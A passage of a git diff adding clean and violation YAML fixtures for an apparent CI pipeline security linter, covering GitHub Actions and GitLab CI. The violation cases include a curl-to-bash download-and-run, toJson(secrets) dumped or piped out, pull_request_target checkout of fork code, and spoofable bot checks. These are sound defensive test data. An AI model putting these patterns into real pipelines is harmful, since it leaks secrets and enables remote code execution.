index 0000000..e02d6d0
--- /dev/null
+++ b/policies/testdata/ISSUE-210/github/violation_sender_login.yml
@@ -0,0 +1,12 @@
+# Step-level if: gating on github.event.sender.login. Same spoofable
+# pattern, different field. Expected: 1 finding.
+name: Triage
+on: [issues]
+
+jobs:
+ label:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Bot-only label
+ if: github.event.sender.login == 'my-trusted-bot'
+ run: gh issue edit --add-label automated
diff --git a/policies/testdata/ISSUE-211/github/clean_normal_check.yml b/policies/testdata/ISSUE-211/github/clean_normal_check.yml
new file mode 100644
index 0000000..a563eb9
--- /dev/null
+++ b/policies/testdata/ISSUE-211/github/clean_normal_check.yml
@@ -0,0 +1,10 @@
+# Normal, sound if: condition. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: github.ref == 'refs/heads/main' && github.event_name == 'push'
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-211/github/violation_contradiction.yml b/policies/testdata/ISSUE-211/github/violation_contradiction.yml
new file mode 100644
index 0000000..c23e1e0
--- /dev/null
+++ b/policies/testdata/ISSUE-211/github/violation_contradiction.yml
@@ -0,0 +1,14 @@
+# `false &&` short-circuits to false β the step never runs, even
+# though the author seems to want to gate on the right operand.
+# Expected: 1 finding.
+name: Nightly
+on:
+ schedule:
+ - cron: '0 0 * * *'
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - if: false && github.event_name == 'schedule'
+ run: ./nightly-task.sh
diff --git a/policies/testdata/ISSUE-211/github/violation_tautology.yml b/policies/testdata/ISSUE-211/github/violation_tautology.yml
new file mode 100644
index 0000000..aa0ec01
--- /dev/null
+++ b/policies/testdata/ISSUE-211/github/violation_tautology.yml
@@ -0,0 +1,12 @@
+# `always() ||` short-circuits the whole OR β the right operand is
+# ignored, the job always runs regardless of the condition the author
+# thought they were adding. Expected: 1 finding.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: always() || github.ref == 'refs/heads/main'
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-212/github/clean_correct_order.yml b/policies/testdata/ISSUE-212/github/clean_correct_order.yml
new file mode 100644
index 0000000..9f5c8b2
--- /dev/null
+++ b/policies/testdata/ISSUE-212/github/clean_correct_order.yml
@@ -0,0 +1,11 @@
+# contains(github.ref, 'refs/heads/main') β ref is the haystack,
+# branch the needle. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: contains(github.ref, 'refs/heads/main')
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-212/github/clean_fromJSON_set.yml b/policies/testdata/ISSUE-212/github/clean_fromJSON_set.yml
new file mode 100644
index 0000000..420a20c
--- /dev/null
+++ b/policies/testdata/ISSUE-212/github/clean_fromJSON_set.yml
@@ -0,0 +1,11 @@
+# Explicit set via fromJSON β canonical safe form for a list of
+# allowed values. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: contains(fromJSON('["main", "release", "staging"]'), github.ref_name)
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-212/github/violation_inverted.yml b/policies/testdata/ISSUE-212/github/violation_inverted.yml
new file mode 100644
index 0000000..4a130c5
--- /dev/null
+++ b/policies/testdata/ISSUE-212/github/violation_inverted.yml
@@ -0,0 +1,12 @@
+# contains('main', github.ref) never matches β 'main' does not
+# contain 'refs/heads/main'. The gate never fires on main. Author
+# meant contains(github.ref, 'main') or similar. Expected: 1.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: contains('main', github.ref)
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-213/github/clean.yml b/policies/testdata/ISSUE-213/github/clean.yml
new file mode 100644
index 0000000..87000f9
--- /dev/null
+++ b/policies/testdata/ISSUE-213/github/clean.yml
@@ -0,0 +1,11 @@
+# Specific field extracted into an env binding β safe. Expected: 0.
+name: PR Telemetry
+on: [pull_request_target]
+
+jobs:
+ report:
+ runs-on: ubuntu-latest
+ env:
+ PR_NUMBER: ${{ github.event.pull_request.number }}
+ steps:
+ - run: echo "PR number: $PR_NUMBER"
diff --git a/policies/testdata/ISSUE-213/github/violation_tojson_github_event.yml b/policies/testdata/ISSUE-213/github/violation_tojson_github_event.yml
new file mode 100644
index 0000000..ba9ee70
--- /dev/null
+++ b/policies/testdata/ISSUE-213/github/violation_tojson_github_event.yml
@@ -0,0 +1,12 @@
+# toJson(github.event) serialised into an env var β any downstream
+# consumer sees every user-controllable field. Expected: 1 finding.
+name: PR Telemetry
+on: [pull_request_target]
+
+jobs:
+ report:
+ runs-on: ubuntu-latest
+ env:
+ PAYLOAD: ${{ toJson(github.event) }}
+ steps:
+ - run: echo "$PAYLOAD" > /tmp/event.json
diff --git a/policies/testdata/ISSUE-214/github/clean.yml b/policies/testdata/ISSUE-214/github/clean.yml
new file mode 100644
index 0000000..62ce26d
--- /dev/null
+++ b/policies/testdata/ISSUE-214/github/clean.yml
@@ -0,0 +1,12 @@
+# Pinned version + lockfile install. Expected: 0 findings.
+name: Test
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: pip install -r requirements.txt
+ - run: npm ci
+ - run: pip install 'pytest==8.3.3'
diff --git a/policies/testdata/ISSUE-214/github/violation_pip_unpinned.yml b/policies/testdata/ISSUE-214/github/violation_pip_unpinned.yml
new file mode 100644
index 0000000..140f0c0
--- /dev/null
+++ b/policies/testdata/ISSUE-214/github/violation_pip_unpinned.yml
@@ -0,0 +1,12 @@
+# `pip install requests` without a version or requirements file.
+# Expected: 1 finding on test.
+name: Test
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: pip install requests
+ - run: pytest
diff --git a/policies/testdata/ISSUE-215/github/clean_env_binding.yml b/policies/testdata/ISSUE-215/github/clean_env_binding.yml
new file mode 100644
index 0000000..8d4467d
--- /dev/null
+++ b/policies/testdata/ISSUE-215/github/clean_env_binding.yml
@@ -0,0 +1,13 @@
+# Canonical fix: bind vars.REGISTRY via env: then dereference $REGISTRY
+# in the shell. Expected: 0 findings.
+name: Login
+on: [push]
+
+jobs:
+ login:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ REGISTRY: ${{ vars.REGISTRY }}
+ TOKEN: ${{ secrets.TOKEN }}
+ run: docker login "$REGISTRY" -u admin -p "$TOKEN"
diff --git a/policies/testdata/ISSUE-215/github/violation_inputs_reusable.yml b/policies/testdata/ISSUE-215/github/violation_inputs_reusable.yml
new file mode 100644
index 0000000..9f256dd
--- /dev/null
+++ b/policies/testdata/ISSUE-215/github/violation_inputs_reusable.yml
@@ -0,0 +1,16 @@
+# Reusable workflow that runs `make ${{ inputs.test-command }}`.
+# A caller that proxies github.event.* into test-command flips the
+# surface to PR-author-controlled. Expected: 1 finding on run.
+name: Acceptance tests
+on:
+ workflow_call:
+ inputs:
+ test-command:
+ type: string
+ required: true
+
+jobs:
+ run:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make ${{ inputs.test-command }}
diff --git a/policies/testdata/ISSUE-215/github/violation_vars_docker_login.yml b/policies/testdata/ISSUE-215/github/violation_vars_docker_login.yml
new file mode 100644
index 0000000..990e9ab
--- /dev/null
+++ b/policies/testdata/ISSUE-215/github/violation_vars_docker_login.yml
@@ -0,0 +1,11 @@
+# `vars.REGISTRY` inlined into a docker login script. If an org-level
+# variable is misconfigured or a maintainer account is compromised,
+# the template expands arbitrary shell. Expected: 1 finding.
+name: Login
+on: [push]
+
+jobs:
+ login:
+ runs-on: ubuntu-latest
+ steps:
+ - run: docker login ${{ vars.REGISTRY }} -u admin -p ${{ secrets.TOKEN }}
diff --git a/policies/testdata/ISSUE-301/github/clean_scoped.yml b/policies/testdata/ISSUE-301/github/clean_scoped.yml
new file mode 100644
index 0000000..1bd9675
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/clean_scoped.yml
@@ -0,0 +1,14 @@
+# Each step names only the secrets it actually needs. This is the
+# intended pattern — no finding expected.
+name: Publish
+on: [push]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ env:
+ NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+ steps:
+ - run: npm publish
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/policies/testdata/ISSUE-301/github/violation_env.yml b/policies/testdata/ISSUE-301/github/violation_env.yml
new file mode 100644
index 0000000..f6bcfcc
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/violation_env.yml
@@ -0,0 +1,13 @@
+# Entire secrets context serialised into an env var. Any downstream
+# command or third-party action that reads SECRETS_JSON sees every
+# secret the job has access to. Expected: 1 finding on call.
+name: Call Reusable
+on: [push]
+
+jobs:
+ call:
+ runs-on: ubuntu-latest
+ env:
+ SECRETS_JSON: ${{ toJson(secrets) }}
+ steps:
+ - run: echo "$SECRETS_JSON" | ./upload
diff --git a/policies/testdata/ISSUE-301/github/violation_run_script.yml b/policies/testdata/ISSUE-301/github/violation_run_script.yml
new file mode 100644
index 0000000..7ed4e0e
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/violation_run_script.yml
@@ -0,0 +1,11 @@
+# toJson(secrets) interpolated directly in a run: shell command.
+# Expected: 1 finding on dump.
+name: Dump
+on: [push]
+
+jobs:
+ dump:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ toJson(secrets) }}' > /tmp/payload.json
diff --git a/policies/testdata/ISSUE-301/github/violation_with.yml b/policies/testdata/ISSUE-301/github/violation_with.yml
new file mode 100644
index 0000000..82eb120
--- /dev/null
+++ b/policies/testdata/ISSUE-301/github/violation_with.yml
@@ -0,0 +1,14 @@
+# Third-party action receives every secret through its with: block.
+# Once the action runs, the whole set is visible to upstream code.
+# Expected: 1 finding on deploy.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: some/deployer@v1
+ with:
+ credentials: ${{ toJson(secrets) }}
+ target: prod
diff --git a/policies/testdata/ISSUE-302/github/clean_named.yml b/policies/testdata/ISSUE-302/github/clean_named.yml
new file mode 100644
index 0000000..344596c
--- /dev/null
+++ b/policies/testdata/ISSUE-302/github/clean_named.yml
@@ -0,0 +1,10 @@
+# Same reusable workflow, but each secret is named explicitly.
+# Expected: 0 findings.
+name: Call
+on: [push]
+
+jobs:
+ call:
+ uses: acme/shared/.github/workflows/publish.yml@v1
+ secrets:
+ NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
diff --git a/policies/testdata/ISSUE-302/github/clean_regular_job.yml b/policies/testdata/ISSUE-302/github/clean_regular_job.yml
new file mode 100644
index 0000000..d4bcb25
--- /dev/null
+++ b/policies/testdata/ISSUE-302/github/clean_regular_job.yml
@@ -0,0 +1,10 @@
+# A regular job (runs-on + steps). No reusable-workflow call here,
+# and no secrets context exposed. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-302/github/violation_inherit.yml b/policies/testdata/ISSUE-302/github/violation_inherit.yml
new file mode 100644
index 0000000..d28cc27
--- /dev/null
+++ b/policies/testdata/ISSUE-302/github/violation_inherit.yml
@@ -0,0 +1,11 @@
+# Reusable workflow called with secrets: inherit — every caller
+# secret is forwarded. If the reusable workflow is compromised
+# (upstream maintainer, tag retag), it sees the full set.
+# Expected: 1 finding on call.
+name: Call
+on: [push]
+
+jobs:
+ call:
+ uses: acme/shared/.github/workflows/publish.yml@v1
+ secrets: inherit
diff --git a/policies/testdata/ISSUE-303/github/clean_scoped.yml b/policies/testdata/ISSUE-303/github/clean_scoped.yml
new file mode 100644
index 0000000..25049fb
--- /dev/null
+++ b/policies/testdata/ISSUE-303/github/clean_scoped.yml
@@ -0,0 +1,13 @@
+# Individual secrets named directly — GitHub still knows every value
+# and masks logs. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ API_USER: ${{ secrets.API_USER }}
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-303/github/violation_env.yml b/policies/testdata/ISSUE-303/github/violation_env.yml
new file mode 100644
index 0000000..daa408a
--- /dev/null
+++ b/policies/testdata/ISSUE-303/github/violation_env.yml
@@ -0,0 +1,13 @@
+# fromJSON(secrets.CREDS).token dereferenced in an env: binding.
+# After fromJSON runs, `token` is a fresh string GitHub does not
+# recognise as a secret — log redaction bypassed. Expected: 1 finding.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ env:
+ API_TOKEN: ${{ fromJSON(secrets.CREDS).token }}
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-303/github/violation_run.yml b/policies/testdata/ISSUE-303/github/violation_run.yml
new file mode 100644
index 0000000..1006614
--- /dev/null
+++ b/policies/testdata/ISSUE-303/github/violation_run.yml
@@ -0,0 +1,10 @@
+# fromJson (camelCase) on secrets with a .field projection inside a
+# run: script. Expected: 1 finding.
+name: Notify
+on: [push]
+
+jobs:
+ notify:
+ runs-on: ubuntu-latest
+ steps:
+ - run: curl -H "X-Token ${{ fromJson(secrets.BLOB).apiKey }}" https://example
diff --git a/policies/testdata/ISSUE-304/github/clean_job_perms.yml b/policies/testdata/ISSUE-304/github/clean_job_perms.yml
new file mode 100644
index 0000000..4a3616e
--- /dev/null
+++ b/policies/testdata/ISSUE-304/github/clean_job_perms.yml
@@ -0,0 +1,11 @@
+# Job-level permissions. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - run: make build
diff --git a/policies/testdata/ISSUE-304/github/clean_workflow_perms.yml b/policies/testdata/ISSUE-304/github/clean_workflow_perms.yml
new file mode 100644
index 0000000..6fab1a3
--- /dev/null
+++ b/policies/testdata/ISSUE-304/github/clean_workflow_perms.yml
@@ -0,0 +1,12 @@
+# Workflow-level permissions propagate to every job. Expected: 0.
+name: Build
+on: [push]
+
+permissions:
+ contents: read
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
diff --git a/policies/testdata/ISSUE-304/github/violation_no_perms.yml b/policies/testdata/ISSUE-304/github/violation_no_perms.yml
new file mode 100644
index 0000000..5534e26
--- /dev/null
+++ b/policies/testdata/ISSUE-304/github/violation_no_perms.yml
@@ -0,0 +1,10 @@
+# No permissions block at either level — token inherits the repo
+# default. Expected: 1 finding.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
diff --git a/policies/testdata/ISSUE-305/github/clean_ci_with_secret.yml b/policies/testdata/ISSUE-305/github/clean_ci_with_secret.yml
new file mode 100644
index 0000000..285a83c
--- /dev/null
+++ b/policies/testdata/ISSUE-305/github/clean_ci_with_secret.yml
@@ -0,0 +1,15 @@
+# Plain CI job that reads a secret (CODECOV_TOKEN) but has no
+# deploy context — no release trigger, no publish action. Stays
+# silent to avoid flagging every CI workflow. Expected: 0.
+name: CI
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: npm test
+ - run: ./upload-coverage.sh
+ env:
+ CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
diff --git a/policies/testdata/ISSUE-305/github/clean_with_env.yml b/policies/testdata/ISSUE-305/github/clean_with_env.yml
new file mode 100644
index 0000000..06d20cf
--- /dev/null
+++ b/policies/testdata/ISSUE-305/github/clean_with_env.yml
@@ -0,0 +1,13 @@
+# Environment: production gates the deploy — required reviewers /
+# wait timers are configurable on the environment. Expected: 0.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ environment: production
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - run: twine upload --password ${{ secrets.PYPI_API_TOKEN }} dist/*
diff --git a/policies/testdata/ISSUE-305/github/violation_release.yml b/policies/testdata/ISSUE-305/github/violation_release.yml
new file mode 100644
index 0000000..7ec7af1
--- /dev/null
+++ b/policies/testdata/ISSUE-305/github/violation_release.yml
@@ -0,0 +1,13 @@
+# Release-triggered publish job uses a PyPI token but declares no
+# environment: — no reviewer stands between release and the token.
+# Expected: 1 finding.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - run: twine upload --password ${{ secrets.PYPI_API_TOKEN }} dist/*
diff --git a/policies/testdata/ISSUE-306/github/clean_default.yml b/policies/testdata/ISSUE-306/github/clean_default.yml
new file mode 100644
index 0000000..891924c
--- /dev/null
+++ b/policies/testdata/ISSUE-306/github/clean_default.yml
@@ -0,0 +1,13 @@
+name: Release
+on: [workflow_dispatch]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-306/github/violation_skip_revoke.yml b/policies/testdata/ISSUE-306/github/violation_skip_revoke.yml
new file mode 100644
index 0000000..8fed0b0
--- /dev/null
+++ b/policies/testdata/ISSUE-306/github/violation_skip_revoke.yml
@@ -0,0 +1,14 @@
+name: Release
+on: [workflow_dispatch]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+ skip-token-revoke: true
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-307/github/clean_credentials_disabled.yml b/policies/testdata/ISSUE-307/github/clean_credentials_disabled.yml
new file mode 100644
index 0000000..5bff626
--- /dev/null
+++ b/policies/testdata/ISSUE-307/github/clean_credentials_disabled.yml
@@ -0,0 +1,12 @@
+# Checkout explicitly disables credential persistence. Expected: 0 findings.
+name: Safe checkout
+on: push
+
+jobs:
+ safe-clone:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ - run: echo "built"
diff --git a/policies/testdata/ISSUE-307/github/violation_default_checkout.yml b/policies/testdata/ISSUE-307/github/violation_default_checkout.yml
new file mode 100644
index 0000000..cc01bf5
--- /dev/null
+++ b/policies/testdata/ISSUE-307/github/violation_default_checkout.yml
@@ -0,0 +1,11 @@
+# Default actions/checkout persists GITHUB_TOKEN in .git/config.
+# Expected: 1 finding on clone.
+name: Default checkout
+on: push
+
+jobs:
+ clone:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: echo "built"
diff --git a/policies/testdata/ISSUE-308/github/clean_literal_quoted.yml b/policies/testdata/ISSUE-308/github/clean_literal_quoted.yml
new file mode 100644
index 0000000..b1eeab6
--- /dev/null
+++ b/policies/testdata/ISSUE-308/github/clean_literal_quoted.yml
@@ -0,0 +1,13 @@
+# Safe forms: secrets.NAME or secrets['NAME'] with a quoted literal.
+# Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ CI_TOKEN: ${{ secrets['CI_TOKEN'] }}
+ run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-308/github/violation_secrets_env_index.yml b/policies/testdata/ISSUE-308/github/violation_secrets_env_index.yml
new file mode 100644
index 0000000..58e3c9a
--- /dev/null
+++ b/policies/testdata/ISSUE-308/github/violation_secrets_env_index.yml
@@ -0,0 +1,17 @@
+# secrets[env.OSC_ACCESS_KEY_NAME] — dynamic index. Which secret is
+# read depends on the env binding; not visible from the workflow alone.
+# Expected: 1 finding on e2e.
+name: E2E
+on: [push]
+
+jobs:
+ e2e:
+ runs-on: ubuntu-latest
+ env:
+ OSC_ACCESS_KEY_NAME: PROD_AK
+ OSC_SECRET_KEY_NAME: PROD_SK
+ steps:
+ - env:
+ OSC_ACCESS_KEY: ${{ secrets[env.OSC_ACCESS_KEY_NAME] }}
+ OSC_SECRET_KEY: ${{ secrets[env.OSC_SECRET_KEY_NAME] }}
+ run: ./run-e2e.sh
diff --git a/policies/testdata/ISSUE-401/gitlab/violation_hardcoded.gitlab-ci.yml b/policies/testdata/ISSUE-401/gitlab/violation_hardcoded.gitlab-ci.yml
new file mode 100644
index 0000000..1753281
--- /dev/null
+++ b/policies/testdata/ISSUE-401/gitlab/violation_hardcoded.gitlab-ci.yml
@@ -0,0 +1,4 @@
+build:
+ image: alpine:3.19
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-410/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-410/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..2854282
--- /dev/null
+++ b/policies/testdata/ISSUE-410/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,5 @@
+sast:
+ stage: test
+ image: alpine:3.19
+ script:
+ - echo SAST
diff --git a/policies/testdata/ISSUE-410/gitlab/violation_allow_failure.gitlab-ci.yml b/policies/testdata/ISSUE-410/gitlab/violation_allow_failure.gitlab-ci.yml
new file mode 100644
index 0000000..a9d0966
--- /dev/null
+++ b/policies/testdata/ISSUE-410/gitlab/violation_allow_failure.gitlab-ci.yml
@@ -0,0 +1,6 @@
+sast:
+ stage: test
+ image: alpine:3.19
+ allow_failure: true
+ script:
+ - echo SAST
diff --git a/policies/testdata/ISSUE-410/gitlab/violation_manual.gitlab-ci.yml b/policies/testdata/ISSUE-410/gitlab/violation_manual.gitlab-ci.yml
new file mode 100644
index 0000000..f120971
--- /dev/null
+++ b/policies/testdata/ISSUE-410/gitlab/violation_manual.gitlab-ci.yml
@@ -0,0 +1,6 @@
+sast:
+ stage: test
+ image: alpine:3.19
+ when: manual
+ script:
+ - echo SAST
diff --git a/policies/testdata/ISSUE-411/gitlab/clean_checksum.gitlab-ci.yml b/policies/testdata/ISSUE-411/gitlab/clean_checksum.gitlab-ci.yml
new file mode 100644
index 0000000..2180db3
--- /dev/null
+++ b/policies/testdata/ISSUE-411/gitlab/clean_checksum.gitlab-ci.yml
@@ -0,0 +1,4 @@
+install:
+ image: alpine:3.19
+ script:
+ - curl -sSL https://example.com/install.sh -o install.sh && sha256sum -c install.sha256 && bash install.sh
diff --git a/policies/testdata/ISSUE-411/gitlab/violation_pipe_to_shell.gitlab-ci.yml b/policies/testdata/ISSUE-411/gitlab/violation_pipe_to_shell.gitlab-ci.yml
new file mode 100644
index 0000000..eba5bac
--- /dev/null
+++ b/policies/testdata/ISSUE-411/gitlab/violation_pipe_to_shell.gitlab-ci.yml
@@ -0,0 +1,4 @@
+install:
+ image: alpine:3.19
+ script:
+ - curl -sSL https://example.com/install.sh | bash
diff --git a/policies/testdata/ISSUE-412/gitlab/clean_kaniko.gitlab-ci.yml b/policies/testdata/ISSUE-412/gitlab/clean_kaniko.gitlab-ci.yml
new file mode 100644
index 0000000..81b0a08
--- /dev/null
+++ b/policies/testdata/ISSUE-412/gitlab/clean_kaniko.gitlab-ci.yml
@@ -0,0 +1,8 @@
+stages:
+ - build
+
+build:
+ stage: build
+ image: gcr.io/kaniko-project/executor:v1
+ script:
+ - /kaniko/executor
diff --git a/policies/testdata/ISSUE-412/gitlab/violation_dind.gitlab-ci.yml b/policies/testdata/ISSUE-412/gitlab/violation_dind.gitlab-ci.yml
new file mode 100644
index 0000000..5dbe1f3
--- /dev/null
+++ b/policies/testdata/ISSUE-412/gitlab/violation_dind.gitlab-ci.yml
@@ -0,0 +1,10 @@
+stages:
+ - build
+
+docker-build:
+ stage: build
+ image: docker:27
+ services:
+ - docker:27-dind
+ script:
+ - docker build .
diff --git a/policies/testdata/ISSUE-413/gitlab/clean_tls_enabled.gitlab-ci.yml b/policies/testdata/ISSUE-413/gitlab/clean_tls_enabled.gitlab-ci.yml
new file mode 100644
index 0000000..312020f
--- /dev/null
+++ b/policies/testdata/ISSUE-413/gitlab/clean_tls_enabled.gitlab-ci.yml
@@ -0,0 +1,8 @@
+docker-build:
+ image: docker:27
+ services:
+ - docker:27-dind
+ variables:
+ DOCKER_TLS_CERTDIR: "/certs"
+ script:
+ - docker build .
diff --git a/policies/testdata/ISSUE-413/gitlab/violation_tls_disabled.gitlab-ci.yml b/policies/testdata/ISSUE-413/gitlab/violation_tls_disabled.gitlab-ci.yml
new file mode 100644
index 0000000..fa8d9d9
--- /dev/null
+++ b/policies/testdata/ISSUE-413/gitlab/violation_tls_disabled.gitlab-ci.yml
@@ -0,0 +1,8 @@
+docker-build:
+ image: docker:27
+ services:
+ - docker:27-dind
+ variables:
+ DOCKER_TLS_CERTDIR: ""
+ script:
+ - docker build .
diff --git a/policies/testdata/ISSUE-414/github/clean_pull_request.yml b/policies/testdata/ISSUE-414/github/clean_pull_request.yml
new file mode 100644
index 0000000..fe97040
--- /dev/null
+++ b/policies/testdata/ISSUE-414/github/clean_pull_request.yml
@@ -0,0 +1,14 @@
+# Standard pull_request and push triggers run without access to the
+# base repo's secrets on forks, so they are not subject to the same
+# privilege-escalation risk. Expected: 0 findings.
+name: Standard PR
+on:
+ pull_request:
+ push:
+ branches: [main]
+
+jobs:
+ ci:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "ci"
diff --git a/policies/testdata/ISSUE-414/github/violation_pull_request_target.yml b/policies/testdata/ISSUE-414/github/violation_pull_request_target.yml
new file mode 100644
index 0000000..3607130
--- /dev/null
+++ b/policies/testdata/ISSUE-414/github/violation_pull_request_target.yml
@@ -0,0 +1,15 @@
+# pull_request_target gives the workflow the base repo's token and
+# secrets while being trivially influenceable by the PR author. The
+# moment the workflow checks out the PR head or runs fork code,
+# secrets leak. Expected: 1 finding on preview.
+name: PR preview
+on:
+ pull_request_target:
+ types: [opened, synchronize]
+
+jobs:
+ preview:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: echo "preview"
diff --git a/policies/testdata/ISSUE-414/github/violation_workflow_run.yml b/policies/testdata/ISSUE-414/github/violation_workflow_run.yml
new file mode 100644
index 0000000..4d12f5a
--- /dev/null
+++ b/policies/testdata/ISSUE-414/github/violation_workflow_run.yml
@@ -0,0 +1,13 @@
+# workflow_run runs with secrets regardless of the originating
+# workflow's trust boundary. Expected: 1 finding on post.
+name: After CI
+on:
+ workflow_run:
+ workflows: [CI]
+ types: [completed]
+
+jobs:
+ post:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "post-run"
diff --git a/policies/testdata/ISSUE-415/github/clean_no_ref.yml b/policies/testdata/ISSUE-415/github/clean_no_ref.yml
new file mode 100644
index 0000000..466b644
--- /dev/null
+++ b/policies/testdata/ISSUE-415/github/clean_no_ref.yml
@@ -0,0 +1,12 @@
+# pull_request_target but no explicit ref: — checkout falls back to
+# the base-repo SHA. No fork code in this run. Still caught by
+# ISSUE-414 but not by this narrower rule. Expected: 0 ISSUE-415.
+name: Label
+on: [pull_request_target]
+
+jobs:
+ label:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: gh pr edit --add-label automated
diff --git a/policies/testdata/ISSUE-415/github/violation_head_sha.yml b/policies/testdata/ISSUE-415/github/violation_head_sha.yml
new file mode 100644
index 0000000..43511a1
--- /dev/null
+++ b/policies/testdata/ISSUE-415/github/violation_head_sha.yml
@@ -0,0 +1,14 @@
+# pull_request_target + explicit checkout of the PR head SHA.
+# Shell steps that run after the checkout see fork-controlled code
+# with base-repo secrets. Expected: 1 finding.
+name: PR Preview
+on: [pull_request_target]
+
+jobs:
+ preview:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: npm install && npm test
diff --git a/policies/testdata/ISSUE-509/github/clean_minimal.yml b/policies/testdata/ISSUE-509/github/clean_minimal.yml
new file mode 100644
index 0000000..4f30cda
--- /dev/null
+++ b/policies/testdata/ISSUE-509/github/clean_minimal.yml
@@ -0,0 +1,13 @@
+# Explicit minimal permissions declared at workflow level.
+# Expected: 0 findings.
+name: Minimal
+on: push
+
+permissions:
+ contents: read
+
+jobs:
+ check:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "ok"
diff --git a/policies/testdata/ISSUE-509/github/violation_job_write_all.yml b/policies/testdata/ISSUE-509/github/violation_job_write_all.yml
new file mode 100644
index 0000000..7aaff52
--- /dev/null
+++ b/policies/testdata/ISSUE-509/github/violation_job_write_all.yml
@@ -0,0 +1,18 @@
+# Only one job opts into write-all. The other is restricted to contents:read.
+# Expected: 1 finding on loose.
+name: Job-level override
+on: push
+
+jobs:
+ restricted:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - run: echo "ok"
+
+ loose:
+ runs-on: ubuntu-latest
+ permissions: write-all
+ steps:
+ - run: echo "loose"
diff --git a/policies/testdata/ISSUE-509/github/violation_workflow_write_all.yml b/policies/testdata/ISSUE-509/github/violation_workflow_write_all.yml
new file mode 100644
index 0000000..17bc648
--- /dev/null
+++ b/policies/testdata/ISSUE-509/github/violation_workflow_write_all.yml
@@ -0,0 +1,12 @@
+# Workflow-level permissions: write-all propagates to every job.
